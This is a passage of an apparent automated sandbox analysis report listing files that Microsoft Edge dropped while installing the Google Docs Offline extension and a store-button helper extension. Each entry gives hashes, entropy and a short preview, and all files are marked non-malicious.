                                                                                                                                                                                                                                                                                                      SHA1:9386E8F723C3F42DA5B3F7E0B9970D2664EA0BAA
                                                                                                                                                                                                                                                                                                      SHA-256:EC78DDD4CCF32B5D76EC701A20167C3FBD146D79A505E4FB0421FC1E5CF4AA63
                                                                                                                                                                                                                                                                                                      SHA-512:30FA4E02120AF1BE6E7CC7DBB15FAE5D50825BD6B3CF28EF21D2F2E217B14AF5B76CFCC165685C3EDC1D09536BFCB10CA07E1E2CC0DA891CEC05E19394AD7144
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"createnew":{"message":"DALA ENTSHA"},"explanationofflinedisabled":{"message":"Awuxhunyiwe ku-inthanethi. Ukuze usebenzise i-Google Amadokhumenti ngaphandle koxhumano lwe-inthanethi, iya kokuthi izilungiselelo ekhasini lasekhaya le-Google Amadokhumenti bese uvula ukuvumelanisa okungaxhunyiwe ku-inthanethi ngesikhathi esilandelayo lapho uxhunywe ku-inthanethi."},"explanationofflineenabled":{"message":"Awuxhunyiwe ku-inthanethi, kodwa usangakwazi ukuhlela amafayela atholakalayo noma udale amasha."},"extdesc":{"message":"Hlela, dala, futhi ubuke amadokhumenti akho, amaspredishithi, namaphrezentheshini \u2014 konke ngaphandle kokufinyelela kwe-inthanethi."},"extname":{"message":"I-Google Amadokhumenti engaxhumekile ku-intanethi"},"learnmore":{"message":"Funda kabanzi"},"popuphelptext":{"message":"Bhala, hlela, futhi hlanganyela noma yikuphi lapho okhona, unalo noma ungenalo uxhumano lwe-inthanethi."}}.

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir7264_2078989178\CRX_INSTALL\_metadata\verified_contents.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):11280
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.751992630887702
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:192:RBG1G1UPkUj/86Op//Ier/2nsNLJtwg+K8HNnswuHEIIMuuqd7CKqvUpGTcjG:m8IEI4u8Rp
                                                                                                                                                                                                                                                                                                      MD5:250C48F4915DD4C0DFA7E7E021A4F066
                                                                                                                                                                                                                                                                                                      SHA1:092A98BF40D8C18280393BF3811A7DFA9A9FD326
                                                                                                                                                                                                                                                                                                      SHA-256:26D9B129339E2E2EB8E0223E16DB3CF0EA220AC0799480D462C236E6A425665E
                                                                                                                                                                                                                                                                                                      SHA-512:8B18E232992E55E8DA97AC46D7AACA061508341D1EADCEFF1E9D0677734DFA8B892AB44754A3AA100585F5B2F2562BC4F2D7103065050FFCD00F91D5915CE5E6
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiIxMjgucG5nIiwicm9vdF9oYXNoIjoiZ2NWZy0xWWgySktRNVFtUmtjZGNmamU1dzVIc1JNN1ZCTmJyaHJ4eGZ5ZyJ9LHsicGF0aCI6Il9sb2NhbGVzL2FmL21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJxaElnV3hDSFVNLWZvSmVFWWFiWWlCNU9nTm9ncUViWUpOcEFhZG5KR0VjIn0seyJwYXRoIjoiX2xvY2FsZXMvYW0vbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IlpPQWJ3cEs2THFGcGxYYjh4RVUyY0VkU0R1aVY0cERNN2lEQ1RKTTIyTzgifSx7InBhdGgiOiJfbG9jYWxlcy9hci9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiUjJVaEZjdTVFcEJfUUZtU19QeGstWWRrSVZqd3l6WEoxdURVZEMyRE9BSSJ9LHsicGF0aCI6Il9sb2NhbGVzL2F6L21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJZVVJ3Mmp4UU5Lem1TZkY0YS1xcTBzbFBSSFc4eUlXRGtMY2g4Ry0zdjJRIn0seyJwYXRoIjoiX2xvY2FsZXMvYmUvbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IjNmRm9XYUZmUHJNelRXSkJsMXlqbUlyRDZ2dzlsa1VxdzZTdjAyUk1oVkEifSx7InBhdGgiOiJfbG9jYWxlcy9iZy9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiSXJ3M3RIem9xREx6bHdGa0hjTllOWFoyNmI0WWVwT2t4ZFN

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir7264_2078989178\CRX_INSTALL\dasherSettingSchema.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):854
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.284628987131403
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:12:ont+QByTwnnGNcMbyWM+Q9TZldnnnGGxlF/S0WOtUL0M0r:vOrGe4dDCVGOjWJ0nr
                                                                                                                                                                                                                                                                                                      MD5:4EC1DF2DA46182103D2FFC3B92D20CA5
                                                                                                                                                                                                                                                                                                      SHA1:FB9D1BA3710CF31A87165317C6EDC110E98994CE
                                                                                                                                                                                                                                                                                                      SHA-256:6C69CE0FE6FAB14F1990A320D704FEE362C175C00EB6C9224AA6F41108918CA6
                                                                                                                                                                                                                                                                                                      SHA-512:939D81E6A82B10FF73A35C931052D8D53D42D915E526665079EEB4820DF4D70F1C6AEBAB70B59519A0014A48514833FEFD687D5A3ED1B06482223A168292105D
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{. "type": "object",. "properties": {. "allowedDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Allow users to enable Docs offline for the specified managed domains.",. "description": "Users on managed devices will be able to enable docs offline if they are part of the specified managed domains.". },. "autoEnabledDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Auto enable Docs offline for the specified managed domains in certain eligible situations.",. "description": "Users on managed devices, in certain eligible situations, will be able to automatically access and edit recent files offline for the managed domains set in this property. They can still disable it from Drive settings.". }. }.}.

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir7264_2078989178\CRX_INSTALL\manifest.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):2525
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.417833205646285
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:1HEZ4WPoolELb/KxktGw3VwELb/4iL2QDkUpvdz1xxy/Atj1K9yiVvQe:WdP5aLTKQGwlTLT4oRvvxs/APKgiVb
                                                                                                                                                                                                                                                                                                      MD5:236D2DD305D64C2B6ABD232ED53270DF
                                                                                                                                                                                                                                                                                                      SHA1:9F6885E95FBC4213631F0B0EA49C803D07D34136
                                                                                                                                                                                                                                                                                                      SHA-256:2A4D526B9D1C8665427FB9E0DA58D16FDDE382DD74C1258941B18701EF7880C3
                                                                                                                                                                                                                                                                                                      SHA-512:B76AF22153F79BCA2429A23746A62A430A521E952E7F94936648ECFD25AFDD9801ACBF6FD16941918A4FEDE39DE747AB6C6336BC86CA74384920AF7E815DB855
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "author": {.. "email": "docs-hosted-app-own@google.com".. },.. "background": {.. "service_worker": "service_worker_bin_prod.js".. },.. "content_capabilities": {.. "matches": [ "https://docs.google.com/*", "https://drive.google.com/*", "https://drive-autopush.corp.google.com/*", "https://drive-daily-0.corp.google.com/*", "https://drive-daily-1.corp.google.com/*", "https://drive-daily-2.corp.google.com/*", "https://drive-daily-3.corp.google.com/*", "https://drive-daily-4.corp.google.com/*", "https://drive-daily-5.corp.google.com/*", "https://drive-daily-6.corp.google.com/*", "https://drive-preprod.corp.google.com/*", "https://drive-staging.corp.google.com/*" ],.. "permissions": [ "clipboardRead", "clipboardWrite", "unlimitedStorage" ].. },.. "content_security_policy": {.. "extension_pages": "script-src 'self'; object-src 'self'".. },.. "default_locale": "en_US",.. "description": "__MSG_extDesc__",.. "externally_connectable": {.. "ma

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir7264_2078989178\CRX_INSTALL\offscreendocument.html

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):97
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.862433271815736
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:PouV7uJL5XL/oGLvLAAJR90bZNGXIL0Hac4NGb:hxuJL5XsOv0EmNV4HX4Qb
                                                                                                                                                                                                                                                                                                      MD5:B747B5922A0BC74BBF0A9BC59DF7685F
                                                                                                                                                                                                                                                                                                      SHA1:7BF124B0BE8EE2CFCD2506C1C6FFC74D1650108C
                                                                                                                                                                                                                                                                                                      SHA-256:B9FA2D52A4FFABB438B56184131B893B04655B01F336066415D4FE839EFE64E7
                                                                                                                                                                                                                                                                                                      SHA-512:7567761BE4054FCB31885E16D119CD4E419A423FFB83C3B3ED80BFBF64E78A73C2E97AAE4E24AB25486CD1E43877842DB0836DB58FBFBCEF495BC53F9B2A20EC
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:<!DOCTYPE html>.<html>.<body>. <script src="offscreendocument_main.js"></script>.</body>.</html>

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir7264_2078989178\CRX_INSTALL\offscreendocument_main.js

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (3777)
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):98880
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.414989230634404
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:1536:M+TW9bPq1M3ZOC0pJ/BjXf3Zk/7hry6fq66V3gr9KUw5SXfPxhZhGurH6c/V:WPLZwJJXf3ZvRV3gJKU/fP+urHRV
                                                                                                                                                                                                                                                                                                      MD5:DC93A1045D1AD8D7ADD06B93B2FE79E2
                                                                                                                                                                                                                                                                                                      SHA1:CAFCC8DB7F8E3FD2F8C1EFAC7B385D7616F55EA3
                                                                                                                                                                                                                                                                                                      SHA-256:D5CEB4449384CD2D7898C052B7B99417961880945FC4EAE80EBBAF8E24CC0A3E
                                                                                                                                                                                                                                                                                                      SHA-512:025F7103D1F7D607825BE916D0131C1E04B295EB562974A77F5A16E7BF40250B5608071779B420E4738F86F09A6F7C889469FA898268894FFFEEB7465C589E81
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:'use strict';function aa(){return function(a){return a}}function ba(){return function(){}}function l(a){return function(){return this[a]}}function ca(a){return function(){return a}}var n;function da(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var ea=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function fa(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var q=fa(this);function r(a,b){if(b)a:{var c=q;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&ea(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new Ty

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir7264_2078989178\CRX_INSTALL\page_embed_script.js

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):291
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.65176400421739
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:6:2LGX86tj66rU8j6D3bWq2un/XBtzHrH9Mnj63LK603:2Q8KVqb2u/Rt3Onj1
                                                                                                                                                                                                                                                                                                      MD5:3AB0CD0F493B1B185B42AD38AE2DD572
                                                                                                                                                                                                                                                                                                      SHA1:079B79C2ED6F67B5A5BD9BC8C85801F96B1B0F4B
                                                                                                                                                                                                                                                                                                      SHA-256:73E3888CCBC8E0425C3D2F8D1E6A7211F7910800EEDE7B1E23AD43D3B21173F7
                                                                                                                                                                                                                                                                                                      SHA-512:32F9DB54654F29F39D49F7A24A1FC800DBC0D4A8A1BAB2369C6F9799BC6ADE54962EFF6010EF6D6419AE51D5B53EC4B26B6E2CDD98DEF7CC0D2ADC3A865F37D3
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:(function(){window._docs_chrome_extension_exists=!0;window._docs_chrome_extension_features_version=2;window._docs_chrome_extension_permissions="alarms clipboardRead clipboardWrite storage unlimitedStorage offscreen".split(" ");window._docs_chrome_extension_manifest_version=3;}).call(this);.

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir7264_2078989178\CRX_INSTALL\service_worker_bin_prod.js

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (3782)
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):107677
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.396220758526552
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:1536:7nwyvB1qCo7mWUgsUopF5Xy4FlAwxdhvHcrdncqAKxwjBnKwIDQgrOChkPIgmrCp:wh6gstXy4FM5ncJKxCnKWgrd0v
                                                                                                                                                                                                                                                                                                      MD5:E8015AC436B33034EDF7DA060E853A04
                                                                                                                                                                                                                                                                                                      SHA1:62D0F6EB0E441158A1F56F6E0C70D3D229B57886
                                                                                                                                                                                                                                                                                                      SHA-256:23C953E989FF4AF6126D4A3B2AD21B33A82512FC8768045C00F05940DE2C9978
                                                                                                                                                                                                                                                                                                      SHA-512:C35AC8692FC22B78365CA202E173A90AE4B5DBA338B7FC9EEB17EDDF5868B52CF1D13DC0EDAF36BE1CC0E0152F41AC4027C51D7ECA27778B483E3FC83F11EA82
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:'use strict';function aa(){return function(a){return a}}function ba(){return function(){}}function k(a){return function(){return this[a]}}function ca(a){return function(){return a}}var n;function da(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var ea=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function fa(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var q=fa(this);function r(a,b){if(b)a:{var c=q;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&ea(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new Ty

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir7264_2078989178\f5ea16bd-c817-4980-ab13-e00efd0bb601.tmp

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):138356
                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.809609231921042
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3072:AQ++ZdS5+fnwcxO+XwquyeNnmraugZ/1DOoncWD/5q:AQ++/PZmlyeNnh/1SmRq
                                                                                                                                                                                                                                                                                                      MD5:3F6F93C3DCCD4A91C4EB25C7F6FEB1C1
                                                                                                                                                                                                                                                                                                      SHA1:9B73F46ADFA1F4464929B408407E73D4535C6827
                                                                                                                                                                                                                                                                                                      SHA-256:19F05352CB4C6E231C1C000B6C8B7E9EDCC1E8082CAF46FFF16B239D32AA7C9E
                                                                                                                                                                                                                                                                                                      SHA-512:D488FA67E3A29D0147E9EAF2EABC74D9A255F8470CF79A4AEA60E3B3B5E48A3FCBC4FC3E9CE58DFF8D7D0CAA8AE749295F221E1FE1BA5D20DEB2D97544A12BA4
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:Cr24..............0.."0...*.H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.q*Ba/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.|.X.M..u..s[.*..?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.*1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[........q.a.....E..i.t,..7C..7!...`l.-.......T.vH...~.....'..aH..C.oJOE..d..2..$J......I..;.(9l.(..+.N.6.@...].a.n.S.6..=.b.W.\....o...#.~J.W.1..E...2H....S.g0....../.H...y.O8...kE.,..m!..F.D.p......H..s.W ...#.L........Ij.........-..n..\..vD.d.V.....!......[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...F0D. ?Eq.M...[6^...+.].G..Y]...7..o.. U...v....P.J...@.E!...B.d..p..i".%............oo.<....~=..!t.+...`....h..LK....0....h...,.R%.....u...._..V_.q:_._..5}.uS\.....x?...~]..C-....S=L...._c.P.B....-M...62.i*.Q.....9.....+S=...../6:...W..ql/g..&j.y..{.."....|..F....|....V....w.%t.y..?..&..a..<.n....S+|..=.ra.....

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir7264_485099217\78c57c0e-febe-4895-8519-b5202c6044d9.tmp

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):11185
                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.951995436832936
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                                                                                                                                                                      MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                                                                                                                                                      SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                                                                                                                                                      SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                                                                                                                                                                      SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:Cr24..............0.."0...*.H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0...*.H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir7264_485099217\CRX_INSTALL\_metadata\verified_contents.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):1753
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.8889033066924155
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:48:Pxpr7Xka2NXDpfsBJODI19Kg1JqcJW9O//JE3ZBDcpu/x:L3XgNSz9/4kIO3u3Xgpq
                                                                                                                                                                                                                                                                                                      MD5:738E757B92939B24CDBBD0EFC2601315
                                                                                                                                                                                                                                                                                                      SHA1:77058CBAFA625AAFBEA867052136C11AD3332143
                                                                                                                                                                                                                                                                                                      SHA-256:D23B2BA94BA22BBB681E6362AE5870ACD8A3280FA9E7241B86A9E12982968947
                                                                                                                                                                                                                                                                                                      SHA-512:DCA3E12DD5A9F1802DB6D11B009FCE2B787E79B9F730094367C9F26D1D87AF1EA072FF5B10888648FB1231DD83475CF45594BB0C9915B655EE363A3127A5FFC2
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:[.. {.. "description": "treehash per file",.. "signed_content": {.. "payload": "eyJpdGVtX2lkIjoiam1qZmxnanBjcGVwZWFmbW1nZHBma29na2doY3BpaGEiLCJpdGVtX3ZlcnNpb24iOiIxLjIuMSIsInByb3RvY29sX3ZlcnNpb24iOjEsImNvbnRlbnRfaGFzaGVzIjpbeyJmb3JtYXQiOiJ0cmVlaGFzaCIsImRpZ2VzdCI6InNoYTI1NiIsImJsb2NrX3NpemUiOjQwOTYsImhhc2hfYmxvY2tfc2l6ZSI6NDA5NiwiZmlsZXMiOlt7InBhdGgiOiJjb250ZW50LmpzIiwicm9vdF9oYXNoIjoiQS13R1JtV0VpM1lybmxQNktneUdrVWJ5Q0FoTG9JZnRRZGtHUnBEcnp1QSJ9LHsicGF0aCI6ImNvbnRlbnRfbmV3LmpzIiwicm9vdF9oYXNoIjoiVU00WVRBMHc5NFlqSHVzVVJaVTFlU2FBSjFXVENKcHhHQUtXMGxhcDIzUSJ9LHsicGF0aCI6Im1hbmlmZXN0Lmpzb24iLCJyb290X2hhc2giOiJKNXYwVTkwRmN0ejBveWJMZmZuNm5TbHFLU0h2bHF2YkdWYW9FeWFOZU1zIn1dfV19",.. "signatures": [.. {.. "header": {.. "kid": "publisher".. },.. "protected": "eyJhbGciOiJSUzI1NiJ9",.. "signature": "UglEEilkOml5P1W0X6wc-_dB87PQB73uMir11923av57zPKujb4IUe_lbGpn7cRZsy6x-8i9eEKxAW7L2TSmYqrcp4XtiON6ppcf27FWACXOUJDax9wlMr-EOtyZhykCnB9vR

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir7264_485099217\CRX_INSTALL\content.js

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:Unicode text, UTF-8 text, with very long lines (8031), with no line terminators
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):9815
                                                                                                                                                                                                                                                                                                      Entropy (8bit):6.1716321262973315
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3zEScQZBMX:+ThBVq3npozftROQIyVfjRZGB365Ey97
                                                                                                                                                                                                                                                                                                      MD5:3D20584F7F6C8EAC79E17CCA4207FB79
                                                                                                                                                                                                                                                                                                      SHA1:3C16DCC27AE52431C8CDD92FBAAB0341524D3092
                                                                                                                                                                                                                                                                                                      SHA-256:0D40A5153CB66B5BDE64906CA3AE750494098F68AD0B4D091256939EEA243643
                                                                                                                                                                                                                                                                                                      SHA-512:315D1B4CC2E70C72D7EB7D51E0F304F6E64AC13AE301FD2E46D585243A6C936B2AD35A0964745D291AE9B317C316A29760B9B9782C88CC6A68599DB531F87D59
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir7264_485099217\CRX_INSTALL\content_new.js

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:Unicode text, UTF-8 text, with very long lines (8604), with no line terminators
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):10388
                                                                                                                                                                                                                                                                                                      Entropy (8bit):6.174387413738973
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3EbmE1F4fn:+ThBVq3npozftROQIyVfjRZGB365Ey9+
                                                                                                                                                                                                                                                                                                      MD5:3DE1E7D989C232FC1B58F4E32DE15D64
                                                                                                                                                                                                                                                                                                      SHA1:42B152EA7E7F31A964914F344543B8BF14B5F558
                                                                                                                                                                                                                                                                                                      SHA-256:D4AA4602A1590A4B8A1BCE8B8D670264C9FB532ADC97A72BC10C43343650385A
                                                                                                                                                                                                                                                                                                      SHA-512:177E5BDF3A1149B0229B6297BAF7B122602F7BD753F96AA41CCF2D15B2BCF6AF368A39BB20336CCCE121645EC097F6BEDB94666C74ACB6174EB728FBFC43BC2A
                                                                                                                                                                                                                                                                                                      Malicious:false
